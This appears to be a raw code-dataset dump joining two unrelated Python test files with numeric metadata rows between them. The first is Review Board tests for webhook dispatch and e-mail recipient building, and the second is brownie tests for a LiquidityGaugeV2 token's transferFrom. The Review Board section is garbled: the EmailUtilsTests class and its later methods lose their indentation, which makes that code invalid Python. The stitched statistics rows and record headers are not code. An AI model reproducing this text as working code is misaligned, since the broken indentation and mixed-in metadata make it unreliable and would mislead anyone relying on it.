        payload = self._check_dispatched(target, 'review_request_reopened')
        self.assertEqual(payload['reopened_by']['id'],
                         review_request.submitter.pk)
        self.assertEqual(payload['review_request']['id'],
                         review_request.display_id)

    def test_review_published(self):
        """Testing webhook dispatch from 'review_published' signal"""
        target = WebHookTarget.objects.create(events='review_published',
                                              url=self.ENDPOINT_URL)

        review_request = self.create_review_request()
        review = self.create_review(review_request)
        review.publish()

        payload = self._check_dispatched(target, 'review_published')
        self.assertEqual(payload['review']['id'], review.pk)
        self.assertIn('diff_comments', payload)
        self.assertIn('screenshot_comments', payload)
        self.assertIn('file_attachment_comments', payload)
        self.assertIn('general_comments', payload)

    def test_review_published_local_site(self):
        """Testing webhook dispatch from 'review_published' signal for a local
        site
        """
        local_site = self._make_local_site()
        target = WebHookTarget.objects.create(events='review_published',
                                              url=self.ENDPOINT_URL,
                                              local_site=local_site)

        review_request = self.create_review_request(local_site=local_site,
                                                    publish=True)
        review = self.create_review(review_request)
        review.publish()

        payload = self._check_dispatched(target, 'review_published')
        self.assertEqual(payload['review']['id'], review.pk)
        self.assertIn('diff_comments', payload)
        self.assertIn('screenshot_comments', payload)
        self.assertIn('file_attachment_comments', payload)
        # NOTE(review): unlike test_review_published, this does not check
        # 'general_comments' -- possibly an oversight; confirm before adding.

    def test_reply_published(self):
        """Testing webhook dispatch from 'reply_published' signal"""
        target = WebHookTarget.objects.create(events='reply_published',
                                              url=self.ENDPOINT_URL)

        review_request = self.create_review_request()
        review = self.create_review(review_request)
        reply = self.create_reply(review)
        reply.publish()

        payload = self._check_dispatched(target, 'reply_published')
        self.assertEqual(payload['reply']['id'], reply.pk)
        self.assertIn('diff_comments', payload)
        self.assertIn('screenshot_comments', payload)
        self.assertIn('file_attachment_comments', payload)
        self.assertIn('general_comments', payload)

        # Test for bug 3999
        self.assertEqual(payload['reply']['links']['diff_comments']['href'],
                         'http://example.com/api/review-requests/1/reviews/1/'
                         'replies/2/diff-comments/')

    def test_reply_published_local_site(self):
        """Testing webhook dispatch from 'reply_published' signal for a local
        site
        """
        local_site = self._make_local_site()
        target = WebHookTarget.objects.create(events='reply_published',
                                              url=self.ENDPOINT_URL,
                                              local_site=local_site)

        review_request = self.create_review_request(local_site=local_site,
                                                    publish=True)
        review = self.create_review(review_request)
        reply = self.create_reply(review)
        reply.publish()

        payload = self._check_dispatched(target, 'reply_published')
        self.assertEqual(payload['reply']['id'], reply.pk)
        self.assertIn('diff_comments', payload)
        self.assertIn('screenshot_comments', payload)
        self.assertIn('file_attachment_comments', payload)
class EmailUtilsTests(TestCase):
"""Testing e-mail utilities that do not send e-mails."""
def test_recipients_to_addresses_with_string_address(self):
    """Testing generating addresses from recipients with string recipients
    """
    # Bare address strings are rejected; recipients must be User or
    # Group instances.
    string_recipients = ['foo@example.com']

    with self.assertRaises(AssertionError):
        recipients_to_addresses(string_recipients)
@add_fixtures(['test_users'])
def test_recipients_to_addresses_with_users(self):
    """Testing generating addresses from recipients with user recipients
    """
    users = list(User.objects.filter(username__in=['doc', 'grumpy']))

    expected_addresses = {
        get_email_address_for_user(user)
        for user in users
    }

    addresses = recipients_to_addresses(users)
    self.assertEqual(len(addresses), 2)
    self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_single_mailinglist(self):
    """Testing generating addresses from recipients that are groups with a
    single mailing list address
    """
    groups = [
        Group(name='group1', display_name='Group One',
              mailing_list='group1@example.com'),
        Group(name='group2', display_name='Group Two',
              mailing_list='group2@example.com'),
    ]

    expected_addresses = set()

    for group in groups:
        expected_addresses.update(get_email_addresses_for_group(group))

    addresses = recipients_to_addresses(groups)
    self.assertEqual(len(addresses), 2)
    self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_many_mailinglist(self):
    """Testing generating addresses from recipients that are groups with
    multiple mailing list addresses
    """
    # Each group lists two comma-separated addresses.
    groups = [
        Group(name='group1', display_name='Group One',
              mailing_list='group1a@example.com,group1b@example.com'),
        Group(name='group2', display_name='Group Two',
              mailing_list='group2a@example.com,group2b@example.com'),
    ]

    expected_addresses = set()

    for group in groups:
        expected_addresses.update(get_email_addresses_for_group(group))

    addresses = recipients_to_addresses(groups)
    self.assertEqual(len(addresses), 4)
    self.assertEqual(addresses, expected_addresses)
@add_fixtures(['test_users'])
def test_recipients_to_addresses_with_groups_and_users(self):
    """Testing generating addresses from recipients that are users and
    groups with mailing list addresses
    """
    groups = [
        Group(name='group1', display_name='Group One',
              mailing_list='group1@example.com'),
        Group(name='group2', display_name='Group Two',
              mailing_list='group2@example.com'),
    ]
    users = list(User.objects.filter(username__in=['doc', 'grumpy']).all())

    expected_addresses = {
        get_email_address_for_user(user)
        for user in users
    }

    for group in groups:
        expected_addresses.update(get_email_addresses_for_group(group))

    addresses = recipients_to_addresses(groups + users)
    self.assertEqual(len(addresses), 4)
    self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_with_members(self):
    """Testing generating addresses from recipients that are groups with
    no mailing list addresses
    """
    group1 = Group.objects.create(name='group1')
    group2 = Group.objects.create(name='group2')

    user1 = User.objects.create(username='user1', first_name='User',
                                last_name='One')
    user2 = User.objects.create(username='user2', first_name='User',
                                last_name='Two')
    group1.users = [user1]
    group2.users = [user2]

    # Without a mailing list, each group expands to its members'
    # addresses.
    addresses = recipients_to_addresses([group1, group2])
    self.assertEqual(
        addresses,
        {
            get_email_address_for_user(user1),
            get_email_address_for_user(user2),
        })
def test_recipients_to_addresses_with_groups_local_site(self):
    """Testing generating addresses from recipients that are groups in
    local sites
    """
    local_site1 = LocalSite.objects.create(name='local-site1')
    local_site2 = LocalSite.objects.create(name='local-site2')
    group1 = Group.objects.create(name='group1', local_site=local_site1)
    group2 = Group.objects.create(name='group2', local_site=local_site2)

    user1 = User.objects.create(username='user1', first_name='User',
                                last_name='One')
    user2 = User.objects.create(username='user2', first_name='User',
                                last_name='Two')

    # user2 is not a member of group2's Local Site, so only user1's
    # address is expected.
    local_site1.users = [user1]
    group1.users = [user1]
    group2.users = [user2]

    addresses = recipients_to_addresses([group1, group2])
    self.assertEqual(len(addresses), 1)
    self.assertEqual(addresses, {get_email_address_for_user(user1)})
def test_recipients_to_addresses_with_groups_inactive_members(self):
    """Testing generating addresses from recipients that are groups with
    inactive members
    """
    group1 = self.create_review_group('group1')
    group2 = self.create_review_group('group2')

    user1 = User.objects.create(username='user1', first_name='User',
                                last_name='One')
    user2 = User.objects.create(username='user2', first_name='User',
                                last_name='Two', is_active=False)
    group1.users = [user1]
    group2.users = [user2]

    # user2 is inactive, so only user1's address is expected.
    addresses = recipients_to_addresses([group1, group2])
    self.assertEqual(len(addresses), 1)
    self.assertEqual(addresses, {get_email_address_for_user(user1)})
def test_recipients_to_addresses_groups_local_site_inactive_members(self):
    """Testing generating addresses from recipients that are groups in
    local sites that have inactive members
    """
    local_site1 = LocalSite.objects.create(name='local-site1')
    local_site2 = LocalSite.objects.create(name='local-site2')
    group1 = self.create_review_group('group1', local_site=local_site1)
    group2 = self.create_review_group('group2', local_site=local_site2)

    user1 = User.objects.create(username='user1', first_name='User',
                                last_name='One')
    user2 = User.objects.create(username='user2', first_name='User',
                                last_name='Two', is_active=False)
    local_site1.users = [user1]
    local_site2.users = [user2]
    group1.users = [user1]
    group2.users = [user2]

    # The inactive user2 is filtered out despite being a Local Site and
    # group member.
    addresses = recipients_to_addresses([group1, group2])
    self.assertEqual(len(addresses), 1)
    self.assertEqual(addresses, {get_email_address_for_user(user1)})
@add_fixtures(['test_users'])
def test_build_recipients_user_receive_email(self):
    """Testing building recipients for a review request where the user
    wants to receive e-mail
    """
    review_request = self.create_review_request()
    submitter = review_request.submitter

    to, cc = build_recipients(submitter, review_request)

    self.assertEqual(to, {submitter})
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_user_not_receive_email(self):
    """Testing building recipients for a review request where the user
    does not want to receive e-mail
    """
    review_request = self.create_review_request()
    submitter = review_request.submitter

    # Opt the submitter out of all e-mail.
    submitter_profile = submitter.get_profile()
    submitter_profile.should_send_email = False
    submitter_profile.save()

    to, cc = build_recipients(submitter, review_request)

    self.assertEqual(len(to), 0)
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_user_not_receive_own_email(self):
    """Testing building recipients for a review request where the user
    does not want to receive e-mail about their updates
    """
    review_request = self.create_review_request()
    submitter = review_request.submitter

    # Opt the submitter out of e-mail about their own changes only.
    submitter_profile = submitter.get_profile()
    submitter_profile.should_send_own_updates = False
    submitter_profile.save()

    to, cc = build_recipients(submitter, review_request)

    self.assertEqual(len(to), 0)
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people_not_receive_own_email(self):
    """Testing building recipients for a review request where the
    submitter is a reviewer and doesn't want to receive e-mail about their
    updates
    """
    review_request = self.create_review_request()
    submitter = review_request.submitter
    review_request.target_people = [submitter]

    submitter_profile = submitter.get_profile()
    submitter_profile.should_send_own_updates = False
    submitter_profile.save()

    # Even as a target reviewer, the submitter isn't sent their own
    # updates.
    to, cc = build_recipients(submitter, review_request)

    self.assertEqual(len(to), 0)
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipient_user_not_receive_own_email(self):
    """Testing building recipients for a review request where the
    submitter is an extra recipient and doesn't want to receive e-mail
    about their updates
    """
    review_request = self.create_review_request()
    submitter = review_request.submitter
    profile = submitter.get_profile()
    profile.should_send_own_updates = False
    profile.save()
    # The third positional argument is the extra recipients list; being
    # listed there still must not override the user's own-updates opt-out.
    to, cc = build_recipients(submitter, review_request, [submitter])
    self.assertEqual(len(to), 0)
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people_and_groups(self):
    """Testing building recipients for a review request where there are
    target users and groups
    """
    group = self.create_review_group()
    user = User.objects.get(username='grumpy')

    review_request = self.create_review_request()
    submitter = review_request.submitter
    review_request.target_people = [user]
    review_request.target_groups = [group]

    to, cc = build_recipients(submitter, review_request)

    # Target people go on To; the submitter and target groups are CC'd.
    self.assertEqual(to, {user})
    self.assertEqual(cc, {submitter, group})
@add_fixtures(['test_users'])
def test_build_recipients_target_people_inactive_and_groups(self):
    """Testing building recipients for a review request where there are
    target groups and inactive target users
    """
    group = self.create_review_group()
    user = User.objects.create(username='user', first_name='User',
                               last_name='Foo', is_active=False)

    review_request = self.create_review_request()
    submitter = review_request.submitter
    review_request.target_people = [user]
    review_request.target_groups = [group]

    to, cc = build_recipients(submitter, review_request)

    # With the only target person inactive, the submitter and group end
    # up on To and nothing is CC'd.
    self.assertEqual(to, {submitter, group})
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_groups(self):
    """Testing build recipients for a review request where there are target
    groups
    """
    group1 = self.create_review_group('group1')
    group2 = self.create_review_group('group2')

    review_request = self.create_review_request()
    submitter = review_request.submitter
    review_request.target_groups = [group1, group2]

    to, cc = build_recipients(submitter, review_request)

    self.assertEqual(len(to), 3)
    self.assertEqual(to, {submitter, group1, group2})
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people(self):
    """Testing building recipients for a review request with target people
    """
    review_request = self.create_review_request()
    submitter = review_request.submitter

    grumpy = User.objects.get(username='grumpy')
    review_request.target_people = [grumpy]

    to, cc = build_recipients(submitter, review_request)

    self.assertEqual(to, {grumpy})
    self.assertEqual(cc, {submitter})
@add_fixtures(['test_users'])
def test_build_recipients_target_people_inactive(self):
    """Testing building recipients for a review request with target people
    who are inactive
    """
    review_request = self.create_review_request()
    submitter = review_request.submitter

    active_user = User.objects.create(username='user1', first_name='User',
                                      last_name='One')
    inactive_user = User.objects.create(username='user2',
                                        first_name='User', last_name='Two',
                                        is_active=False)
    review_request.target_people = [active_user, inactive_user]

    to, cc = build_recipients(submitter, review_request)

    # The inactive reviewer is dropped.
    self.assertEqual(to, {active_user})
    self.assertEqual(cc, {submitter})
@add_fixtures(['test_users'])
def test_build_recipients_target_people_no_email(self):
    """Testing building recipients for a review request with target people
    who don't receive e-mail
    """
    review_request = self.create_review_request()
    submitter = review_request.submitter

    user1 = User.objects.create(username='user1', first_name='User',
                                last_name='One')
    user2 = User.objects.create(username='user2', first_name='User',
                                last_name='Two')

    # user2 has opted out of e-mail entirely.
    Profile.objects.create(user=user2, should_send_email=False)

    review_request.target_people = [user1, user2]

    to, cc = build_recipients(submitter, review_request)

    self.assertEqual(to, {user1})
    self.assertEqual(cc, {submitter})
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site(self):
    """Testing building recipients for a review request where the target
    people are in local sites
    """
    local_site = LocalSite.objects.create(name=self.local_site_name)

    user1 = User.objects.create(username='user1', first_name='User',
                                last_name='One')
    user2 = User.objects.create(username='user2', first_name='User',
                                last_name='Two')

    # Only user1 is a member of the Local Site.
    local_site.users = [user1]

    review_request = self.create_review_request(with_local_site=True)
    review_request.target_people = [user1, user2]
    submitter = review_request.submitter

    to, cc = build_recipients(submitter, review_request)

    self.assertEqual(to, {user1})
    self.assertEqual(cc, {submitter})
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site_inactive(self):
    """Testing building recipients for a review request where the target
    people are in local sites and are inactive
    """
    local_site = LocalSite.objects.create(name=self.local_site_name)

    user1 = User.objects.create(username='user1', first_name='User',
                                last_name='One')
    user2 = User.objects.create(username='user2', first_name='User',
                                last_name='Two', is_active=False)

    # Both users are site members, but user2 is inactive.
    local_site.users = [user1, user2]

    review_request = self.create_review_request(with_local_site=True)
    review_request.target_people = [user1, user2]
    submitter = review_request.submitter

    to, cc = build_recipients(submitter, review_request)

    self.assertEqual(to, {user1})
    self.assertEqual(cc, {submitter})
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site_no_email(self):
    """Testing building recipients for a review request where the target
    people are in local sites and don't receive e-mail
    """
    local_site = LocalSite.objects.create(name=self.local_site_name)

    user1 = User.objects.create(username='user1', first_name='User',
                                last_name='One')
    user2 = User.objects.create(username='user2', first_name='User',
                                last_name='Two')

    # user2 has opted out of e-mail entirely.
    Profile.objects.create(user=user2,
                           should_send_email=False)

    local_site.users = [user1, user2]

    review_request = self.create_review_request(with_local_site=True)
    review_request.target_people = [user1, user2]
    submitter = review_request.submitter

    to, cc = build_recipients(submitter, review_request)

    self.assertEqual(to, {user1})
    self.assertEqual(cc, {submitter})
@add_fixtures(['test_users'])
def test_build_recipients_limit_to(self):
    """Testing building recipients with a limited recipients list"""
    dopey = User.objects.get(username='dopey')
    grumpy = User.objects.get(username='grumpy')
    group = self.create_review_group()

    review_request = self.create_review_request()
    submitter = review_request.submitter
    review_request.target_people = [dopey]
    review_request.target_groups = [group]

    to, cc = build_recipients(submitter, review_request,
                              limit_recipients_to=[grumpy])

    # The limited list takes precedence over target people/groups.
    self.assertEqual(to, {submitter, grumpy})
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_limit_to_inactive(self):
    """Testing building recipients with a limited recipients list that
    contains inactive users
    """
    active_user = User.objects.create(username='user1', first_name='User',
                                      last_name='One')
    inactive_user = User.objects.create(username='user2',
                                        first_name='User', last_name='Two',
                                        is_active=False)

    review_request = self.create_review_request()
    submitter = review_request.submitter

    to, cc = build_recipients(
        submitter, review_request,
        limit_recipients_to=[active_user, inactive_user])

    self.assertEqual(to, {submitter, active_user})
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_limit_to_local_site(self):
    """Testing building recipients with a limited recipients list that
    contains users in local sites
    """
    local_site1 = LocalSite.objects.create(name='local-site1')
    local_site2 = LocalSite.objects.create(name='local-site2')

    user1 = User.objects.create(username='user1', first_name='User',
                                last_name='One')
    user2 = User.objects.create(username='user2', first_name='User',
                                last_name='Two')
    local_site1.users = [user1]
    local_site2.users = [user2]

    # The review request lives on local_site1, so only user1 is eligible.
    review_request = self.create_review_request(local_site=local_site1)
    submitter = review_request.submitter

    to, cc = build_recipients(submitter, review_request,
                              limit_recipients_to=[user1, user2])

    self.assertEqual(to, {submitter, user1})
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients(self):
    """Testing building recipients with an extra recipients list"""
    review_request = self.create_review_request()
    submitter = review_request.submitter
    grumpy = User.objects.get(username='grumpy')

    to, cc = build_recipients(submitter, review_request,
                              extra_recipients=[grumpy])

    self.assertEqual(to, {submitter, grumpy})
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_inactive(self):
    """Testing building recipients with an extra recipients list that
    contains inactive users
    """
    active_user = User.objects.create(username='user1', first_name='User',
                                      last_name='One')
    inactive_user = User.objects.create(username='user2',
                                        first_name='User', last_name='Two',
                                        is_active=False)

    review_request = self.create_review_request()
    submitter = review_request.submitter

    to, cc = build_recipients(
        submitter, review_request,
        extra_recipients=[active_user, inactive_user])

    self.assertEqual(to, {submitter, active_user})
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_local_site(self):
    """Testing building recipients with an extra recipients list that
    contains users in local sites
    """
    local_site1 = LocalSite.objects.create(name='local-site1')
    local_site2 = LocalSite.objects.create(name='local-site2')

    user1 = User.objects.create(username='user1', first_name='User',
                                last_name='One')
    user2 = User.objects.create(username='user2', first_name='User',
                                last_name='Two')
    local_site1.users = [user1]
    local_site2.users = [user2]

    # The review request lives on local_site1, so only user1 is eligible.
    review_request = self.create_review_request(local_site=local_site1)
    submitter = review_request.submitter

    to, cc = build_recipients(submitter, review_request,
                              extra_recipients=[user1, user2])

    self.assertEqual(to, {submitter, user1})
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to(self):
    """Testing building recipients with an extra recipients list and
    a limited recipients list
    """
    extra_user = User.objects.create(username='user1', first_name='User',
                                     last_name='One')
    limited_user = User.objects.create(username='user2',
                                       first_name='User', last_name='Two')
    target_user = User.objects.create(username='user3',
                                      first_name='User',
                                      last_name='Three')
    group = self.create_review_group()

    review_request = self.create_review_request()
    submitter = review_request.submitter
    review_request.target_people = [target_user]
    review_request.target_groups = [group]

    to, cc = build_recipients(submitter, review_request,
                              extra_recipients=[extra_user],
                              limit_recipients_to=[limited_user])

    # Only the limited list (plus the submitter) survives; extra
    # recipients and target people/groups are filtered out.
    self.assertEqual(to, {submitter, limited_user})
    self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to_inactive(self):
"""Testing building recipients with an extra recipients list and a
limited recipients list that contains inactive users
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
group = self.create_review_group()
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to_local_site(self):
"""Testing building recipients with an extra recipients list and a
limited recipients list that contains users in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
local_site1.users = [user1, user3]
local_site2.users = [user2]
group = self.create_review_group()
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred(self):
"""Testing building recipients where the review request has been
starred by a user
"""
review_request = self.create_review_request()
submitter = review_request.submitter
grumpy = User.objects.get(username='grumpy')
profile = grumpy.get_profile()
profile.starred_review_requests = [review_request]
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, grumpy]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred_inactive(self):
"""Testing building recipients where the review request has been
starred by users that may be inactive
"""
review_request = self.create_review_request()
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
profile1 = Profile.objects.create(user=user1)
profile1.starred_review_requests = [review_request]
profile2 = Profile.objects.create(user=user2)
profile2.starred_review_requests = [review_request]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred_local_site(self):
"""Testing building recipients where the review request has been
starred by users that are in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
local_site2.users = [user2]
profile1 = Profile.objects.create(user=user1)
profile1.starred_review_requests = [review_request]
profile2 = Profile.objects.create(user=user2)
profile2.starred_review_requests = [review_request]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
| 39.804715
| 79
| 0.614754
| 12,167
| 113,125
| 5.481795
| 0.043643
| 0.114218
| 0.027827
| 0.027587
| 0.86764
| 0.841912
| 0.816349
| 0.79101
| 0.763258
| 0.740318
| 0
| 0.008373
| 0.287328
| 113,125
| 2,841
| 80
| 39.818726
| 0.818918
| 0.087116
| 0
| 0.714286
| 0
| 0.00051
| 0.080575
| 0.019863
| 0
| 0
| 0
| 0
| 0.209694
| 1
| 0.063265
| false
| 0.001531
| 0.011224
| 0.00051
| 0.083673
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbf30ae375cc2df789f5c44b5f46f5b7107c68f5
| 6,772
|
py
|
Python
|
tests/unitary/LiquidityGaugeV2/test_transferFrom.py
|
AqualisDAO/curve-dao-contracts
|
beec73a068da8ed01c0f710939dc5adb776d565b
|
[
"MIT"
] | 217
|
2020-06-24T14:01:21.000Z
|
2022-03-29T08:35:24.000Z
|
tests/unitary/LiquidityGaugeV2/test_transferFrom.py
|
AqualisDAO/curve-dao-contracts
|
beec73a068da8ed01c0f710939dc5adb776d565b
|
[
"MIT"
] | 25
|
2020-06-24T09:39:02.000Z
|
2022-03-22T17:03:00.000Z
|
tests/unitary/LiquidityGaugeV2/test_transferFrom.py
|
AqualisDAO/curve-dao-contracts
|
beec73a068da8ed01c0f710939dc5adb776d565b
|
[
"MIT"
] | 110
|
2020-07-10T22:45:49.000Z
|
2022-03-29T02:51:08.000Z
|
#!/usr/bin/python3
import brownie
import pytest
@pytest.fixture(scope="module", autouse=True)
def setup(accounts, gauge_controller, minter, gauge_v2, token, mock_lp_token):
    """Wire the gauge into the controller and give accounts[0] a gauge balance."""
    deployer = accounts[0]
    token.set_minter(minter, {"from": deployer})
    gauge_controller.add_type(b"Liquidity", 10 ** 10, {"from": deployer})
    gauge_controller.add_gauge(gauge_v2, 0, 0, {"from": deployer})
    # Unlimited LP-token approval so the deposit below succeeds.
    mock_lp_token.approve(gauge_v2, 2 ** 256 - 1, {"from": deployer})
    gauge_v2.deposit(10 ** 18, {"from": deployer})
def test_sender_balance_decreases(accounts, gauge_v2):
    """transferFrom debits the token owner by exactly the transferred amount."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    initial = gauge_v2.balanceOf(owner)
    amount = initial // 4
    gauge_v2.approve(spender, amount, {"from": owner})
    gauge_v2.transferFrom(owner, receiver, amount, {"from": spender})
    assert gauge_v2.balanceOf(owner) == initial - amount
def test_receiver_balance_increases(accounts, gauge_v2):
    """transferFrom credits the receiver by exactly the transferred amount."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    initial = gauge_v2.balanceOf(receiver)
    amount = gauge_v2.balanceOf(owner) // 4
    gauge_v2.approve(spender, amount, {"from": owner})
    gauge_v2.transferFrom(owner, receiver, amount, {"from": spender})
    assert gauge_v2.balanceOf(receiver) == initial + amount
def test_caller_balance_not_affected(accounts, gauge_v2):
    """The spender's own balance is untouched by a transferFrom it executes."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    spender_initial = gauge_v2.balanceOf(spender)
    amount = gauge_v2.balanceOf(owner)
    gauge_v2.approve(spender, amount, {"from": owner})
    gauge_v2.transferFrom(owner, receiver, amount, {"from": spender})
    assert gauge_v2.balanceOf(spender) == spender_initial
def test_caller_approval_affected(accounts, gauge_v2):
    """A partial transferFrom reduces the spender's allowance by the amount spent."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    approved = gauge_v2.balanceOf(owner)
    spent = approved // 4
    gauge_v2.approve(spender, approved, {"from": owner})
    gauge_v2.transferFrom(owner, receiver, spent, {"from": spender})
    assert gauge_v2.allowance(owner, spender) == approved - spent
def test_receiver_approval_not_affected(accounts, gauge_v2):
    """Spending via one spender leaves another spender's allowance intact."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    approved = gauge_v2.balanceOf(owner)
    spent = approved // 4
    # Both spender and receiver get an allowance; only spender uses theirs.
    gauge_v2.approve(spender, approved, {"from": owner})
    gauge_v2.approve(receiver, approved, {"from": owner})
    gauge_v2.transferFrom(owner, receiver, spent, {"from": spender})
    assert gauge_v2.allowance(owner, receiver) == approved
def test_total_supply_not_affected(accounts, gauge_v2):
    """Transfers move balances around without changing totalSupply."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    supply_before = gauge_v2.totalSupply()
    amount = gauge_v2.balanceOf(owner)
    gauge_v2.approve(spender, amount, {"from": owner})
    gauge_v2.transferFrom(owner, receiver, amount, {"from": spender})
    assert gauge_v2.totalSupply() == supply_before
def test_returns_true(accounts, gauge_v2):
    """A successful transferFrom returns True, per the ERC-20 convention."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    amount = gauge_v2.balanceOf(owner)
    gauge_v2.approve(spender, amount, {"from": owner})
    tx = gauge_v2.transferFrom(owner, receiver, amount, {"from": spender})
    assert tx.return_value is True
def test_transfer_full_balance(accounts, gauge_v2):
    """Transferring the owner's entire balance zeroes it and credits the receiver."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    amount = gauge_v2.balanceOf(owner)
    receiver_initial = gauge_v2.balanceOf(receiver)
    gauge_v2.approve(spender, amount, {"from": owner})
    gauge_v2.transferFrom(owner, receiver, amount, {"from": spender})
    assert gauge_v2.balanceOf(owner) == 0
    assert gauge_v2.balanceOf(receiver) == receiver_initial + amount
def test_transfer_zero_tokens(accounts, gauge_v2):
    """A zero-amount transferFrom succeeds and changes no balances."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    owner_initial = gauge_v2.balanceOf(owner)
    receiver_initial = gauge_v2.balanceOf(receiver)
    gauge_v2.approve(spender, owner_initial, {"from": owner})
    gauge_v2.transferFrom(owner, receiver, 0, {"from": spender})
    assert gauge_v2.balanceOf(owner) == owner_initial
    assert gauge_v2.balanceOf(receiver) == receiver_initial
def test_transfer_zero_tokens_without_approval(accounts, gauge_v2):
    """A zero-amount transferFrom needs no allowance and changes no balances."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    owner_initial = gauge_v2.balanceOf(owner)
    receiver_initial = gauge_v2.balanceOf(receiver)
    gauge_v2.transferFrom(owner, receiver, 0, {"from": spender})
    assert gauge_v2.balanceOf(owner) == owner_initial
    assert gauge_v2.balanceOf(receiver) == receiver_initial
def test_insufficient_balance(accounts, gauge_v2):
    """transferFrom reverts when the amount exceeds the owner's balance."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    too_much = gauge_v2.balanceOf(owner) + 1
    gauge_v2.approve(spender, too_much, {"from": owner})
    with brownie.reverts():
        gauge_v2.transferFrom(owner, receiver, too_much, {"from": spender})
def test_insufficient_approval(accounts, gauge_v2):
    """transferFrom reverts when the amount exceeds the approved allowance."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    balance = gauge_v2.balanceOf(owner)
    gauge_v2.approve(spender, balance - 1, {"from": owner})
    with brownie.reverts():
        gauge_v2.transferFrom(owner, receiver, balance, {"from": spender})
def test_no_approval(accounts, gauge_v2):
    """transferFrom reverts when the spender was never approved."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    balance = gauge_v2.balanceOf(owner)
    with brownie.reverts():
        gauge_v2.transferFrom(owner, receiver, balance, {"from": spender})
def test_infinite_approval(accounts, gauge_v2):
    """An allowance of 2**256-1 is treated as infinite and never decremented."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    unlimited = 2 ** 256 - 1
    gauge_v2.approve(spender, unlimited, {"from": owner})
    gauge_v2.transferFrom(owner, receiver, 10000, {"from": spender})
    assert gauge_v2.allowance(owner, spender) == unlimited
def test_revoked_approval(accounts, gauge_v2):
    """transferFrom reverts after the allowance has been reset to zero."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    balance = gauge_v2.balanceOf(owner)
    gauge_v2.approve(spender, balance, {"from": owner})
